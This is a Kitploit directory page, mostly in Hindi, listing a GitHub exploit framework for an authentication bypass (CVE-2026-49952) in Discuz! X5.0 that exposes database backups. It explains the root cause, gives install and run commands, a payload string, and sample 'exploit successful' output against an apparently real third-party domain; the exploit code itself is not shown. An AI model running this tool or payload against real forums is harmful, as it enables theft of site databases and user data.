Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Discuz-X5.0-Authentication-Bypass-Exploit-Framework — Discuz! X5.0 Authentication Bypass Exploit Framework (CVE-2026-49952) - गंभीर भेद्यता जो UC_KEY एन्क्रिप्शन ओरेकल टोकन पुन: उपयोग के माध्यम से बिना प्रमाणीकरण के डेटाबेस बैकअप तक पहुंच की अनुमति देती है। CVSS 9.1। संस्करण का पता लगाने, मल्टी-पेलोड हमलों, इंटरैक्टिव शेल और स्वचालित एक्सप्लॉइटेशन के साथ पूर्ण सुविधाओं वाला टूल। केवल अधिकृत परीक्षण के लिए। | Kitploit
उपकरण/GitHubGitHub/cerberusmrxi/discuz-x5.0-authentication-bypass-exploit-framework
प्रमाणीकरण और प्राधिकरणशोषण फ्रेमवर्कभेद्यता विश्लेषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHub

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
cerberusmrxi/discuz-x5.0-authentication-bypass-exploit-framework

Discuz-X5.0-Authentication-Bypass-Exploit-Framework

रिपॉजिटरी देखें
1162 महीने पहलेअभी तक समीक्षित नहीं

विवरण

Discuz! X5.0 Authentication Bypass Exploit Framework (CVE-2026-49952) - गंभीर भेद्यता जो UC_KEY एन्क्रिप्शन ओरेकल टोकन पुन: उपयोग के माध्यम से बिना प्रमाणीकरण के डेटाबेस बैकअप तक पहुंच की अनुमति देती है। CVSS 9.1। संस्करण का पता लगाने, मल्टी-पेलोड हमलों, इंटरैक्टिव शेल और स्वचालित एक्सप्लॉइटेशन के साथ पूर्ण सुविधाओं वाला टूल। केवल अधिकृत परीक्षण के लिए।

साझा करें

Discuz! X5.0 Authentication Bypass Exploit Framework

Security CVE CVSS Python License Version

⚡ CVE-2026-49952 | CVSS 9.1 (गंभीर ) | संस्करण 1.0.0

Discuz! X5.0 में गंभीर प्रमाणीकरण बायपास भेद्यता की पहचान करने और उसे प्रदर्शित करने के लिए डिज़ाइन किया गया एक पेशेवर पेनिट्रेशन परीक्षण उपकरण।

D1

📋 विषय-सूची

  • ⚠️ अस्वीकरण

  • 🔍 अवलोकन

  • 🎯 भेद्यता विवरण

  • ✨ विशेषताएँ

  • 📦 स्थापना

  • 🚀 त्वरित आरंभ

  • 💻 उपयोग उदाहरण

  • 🖥️ इंटरैक्टिव शेल

  • 🛡️ सुरक्षा संबंधी विचार

  • 🔧 समस्या निवारण

  • 📄 लाइसेंस


⚠️ अस्वीकरण

महत्वपूर्ण सूचनायह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।इस उपकरण का उपयोग ऐसी प्रणालियों पर न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है।कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध और अनैतिक है।लेखक इस उपकरण से होने वाले किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।इस उपकरण का उपयोग करके, आप सभी लागू कानूनों और विनियमों का पालन करने के लिए सहमत होते हैं।


🔍 अवलोकन

Discuz! X5.0 Authentication Bypass Exploit Framework 20 मार्च 2026 और 1 मई 2026 के बीच जारी Discuz! X5.0 संस्करणों में गंभीर प्रमाणीकरण बायपास भेद्यता (CVE-2026-49952) की पहचान करने और उसे प्रदर्शित करने के लिए डिज़ाइन किया गया है।

यह भेद्यता अनप्रमाणित हमलावरों को टोकन पुन: उपयोग के लिए UC_KEY एन्क्रिप्शन ओरेकल का शोषण करके डेटाबेस बैकअप कार्यक्षमता (dbbak.php) तक पहुँचने की अनुमति देती है, जिससे संवेदनशील डेटाबेस सामग्री उजागर हो सकती है।

मुख्य बिंदु

  • 🏆 CVSS स्कोर: 9.1 (गंभीर)

  • 🔐 प्रभाव: प्रमाणीकरण बायपास

  • 📂 पहुँच: डेटाबेस बैकअप फ़ाइलें

  • ⚡ जटिलता: निम्न (शोषण करना आसान)

  • 🎯 लक्ष्य: Discuz! X5.0 (20260320 - 20260501)


🎯 भेद्यता विवरण

तकनीकी सारांश

गुणविवरण
भेद्यता प्रकारप्रमाणीकरण बायपास
CVE IDCVE-2026-49952
CVSS संस्करण3.1
CVSS स्कोर9.1 (गंभीर)
हमला वेक्टरनेटवर्क
हमले की जटिलतानिम्न
आवश्यक विशेषाधिकारकोई नहीं
उपयोगकर्ता सहभागिताकोई नहीं
गोपनीयता प्रभावउच्च
अखंडता प्रभावउच्च
उपलब्धता प्रभावउच्च
एक्सप्लॉइट कोड परिपक्वताकार्यात्मक
उपचार स्तरआधिकारिक फिक्स उपलब्ध

मूल कारण

यह भेद्यता dbbak.php एंडपॉइंट में मौजूद है, जहाँ टोकन सत्यापन तंत्र UC_KEY एन्क्रिप्शन ओरेकल पर निर्भर करता है। लॉगिन अनुरोध (member.php) में एक विशिष्ट पेलोड तैयार करके, एक हमलावर एक वैध प्रमाणीकरण टोकन प्राप्त कर सकता है, जिसे उचित प्राधिकरण के बिना डेटाबेस बैकअप कार्यक्षमता तक पहुँचने के लिए पुन: उपयोग किया जा सकता है।

प्रभावित संस्करण

  • ❌ Discuz! X5.0 (20260320 - 20260501) - असुरक्षित

  • ✅ Discuz! X5.0 (20260510+) - पैच किया गया


✨ विशेषताएँ

मुख्य विशेषताएँ

  • 🔍 संस्करण पहचान: स्वचालित फिंगरप्रिंटिंग और Discuz! संस्करण की पहचान।

  • ⚡ मल्टी-पेलोड हमला: कई पेलोड वेरिएंट का समानांतर परीक्षण।

  • 🖥️ इंटरैक्टिव शेल: मैन्युअल शोषण के लिए पूर्ण-विशेषताओं वाला कमांड-लाइन इंटरफ़ेस।

  • 🚀 स्वचालित शोषण: न्यूनतम कॉन्फ़िगरेशन के साथ एक-क्लिक शोषण।

  • 📊 परिणाम सहेजना: शोषण परिणामों को टाइमस्टैम्प्ड फ़ाइलों में निर्यात करें।

  • 🌐 प्रॉक्सी समर्थन: नेटवर्क ट्रैवर्सल के लिए HTTP/HTTPS प्रॉक्सी कॉन्फ़िगरेशन।

  • 🎯 थ्रेडेड स्कैनिंग: प्रदर्शन अनुकूलन के लिए कॉन्फ़िगर करने योग्य थ्रेड संख्या।

  • 🎨 रंगीन आउटपुट: पेशेवर रंग-कोडित टर्मिनल आउटपुट।

उन्नत विशेषताएँ

  • 🔐 SSL/TLS समर्थन: HTTP और HTTPS दोनों लक्ष्यों को संभालता है।

  • 🔄 सत्र प्रबंधन: स्थायी सत्र स्थिति बनाए रखता है।

  • 📦 पेलोड अनुकूलन: कस्टम पेलोड इंजेक्शन के लिए समर्थन।

  • 🎯 लक्ष्य सत्यापन: शोषण से पहले Discuz! इंस्टॉलेशन की पुष्टि करता है।


📦 स्थापना

पूर्वापेक्षाएँ

  • Python: संस्करण 3.7 या उससे अधिक

  • Pip: Python पैकेज मैनेजर

स्रोत से स्थापित करें

# Clone the repository
git clone https://github.com/CerberusMrXi/Discuz-X5.0-Authentication-Bypass-Exploit-Framework
cd Discuz-X5.0-Authentication-Bypass-Exploit-Framework

# Install required packages
pip install -r requirements.txt

# Verify installation
python3 exploit.py --help

Docker से स्थापित करें

# Build the Docker image
docker build -t exploit .

# Run the container
docker run -it --rm exploit http://target.com

🚀 त्वरित आरंभ

बुनियादी उपयोग

# Simple exploitation
python3 exploit.py http://target.com

# With output file
python3 exploit.py http://target.com --output results.txt

# Verbose mode for debugging
python3 exploit.py http://target.com --verbose

उन्नत उपयोग

# With proxy and custom threads
python3 exploit.py https://target.com --proxy http://127.0.0.1:8080 --threads 10

# Custom payload
python3 exploit.py http://target.com --payload "admin|1|0|0"

💻 उपयोग उदाहरण

उदाहरण 1: बुनियादी शोषण

python3 exploit.py http://discuz.eda.com.my
📤 अपेक्षित आउटपुट
██████╗ ██╗███████╗██╗   ██╗███████╗███████╗██████╗ 
██╔══██╗██║██╔════╝██║   ██║╚══███╔╝╚══███╔╝╚════██╗
██║  ██║██║███████╗██║   ██║  ███╔╝  ███╔╝  █████╔╝
██║  ██║██║╚════██║██║   ██║ ███╔╝  ███╔╝  ██╔═══╝ 
██████╔╝██║███████║╚██████╔╝███████╗███████╗███████╗
╚═════╝ ╚═╝╚══════╝ ╚═════╝ ╚══════╝╚══════╝╚══════╝

Discuz! X5.0 Authentication Bypass Exploit Framework
CVE-2026-49952 | CVSS: 9.1 (Critical )
Author: Sudeepa Wanigarathna | Version: 1.0.0
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[14:32:15] ► Phase 1: Target Reconnaissance
[14:32:15] ➜ Testing connectivity to http://discuz.eda.com.my
[14:32:16] ➜ Detecting Discuz! version...
[14:32:16] ✔ Discuz! Version: X5.0
[14:32:16] ⚡ Target is running a vulnerable version!
[14:32:16] ► Phase 2: Authcode Acquisition
[14:32:16] ➜ Extracting authcode with payload: admin|1|0|0
[14:32:17] ✔ Authcode: aBcDeFgHiJkLmNoPqRsT...
[14:32:17] ► Phase 3: Exploitation
[14:32:17] ➜ Executing exploit (operation: backup )
[14:32:18] ✔ Exploit successful!
[14:32:18] ✔ Results saved to discuz_exploit_20260724_143218.txt

╔══════════════════════════════════════════════════════════╗
║  EXPLOIT SUCCESSFUL                                      ║
╠══════════════════════════════════════════════════════════╣
║  Target: http://discuz.eda.com.my                        ║
║  Authcode: aBcDeFgHiJkLmNoPqRsT...                       ║
║  Status: Database backup accessed                        ║
║  Data Size: 24567 bytes                                  ║
║  Saved to: discuz_exploit_20260724_143218.txt            ║
╚══════════════════════════════════════════════════════════╝

🖥️ इंटरैक्टिव शेल

मैन्युअल शोषण के लिए इंटरैक्टिव शेल प्रारंभ करें:

python3 discuz_exploit.py http://target.com --interactive

उपलब्ध कमांड

टूल डाउनलोड करें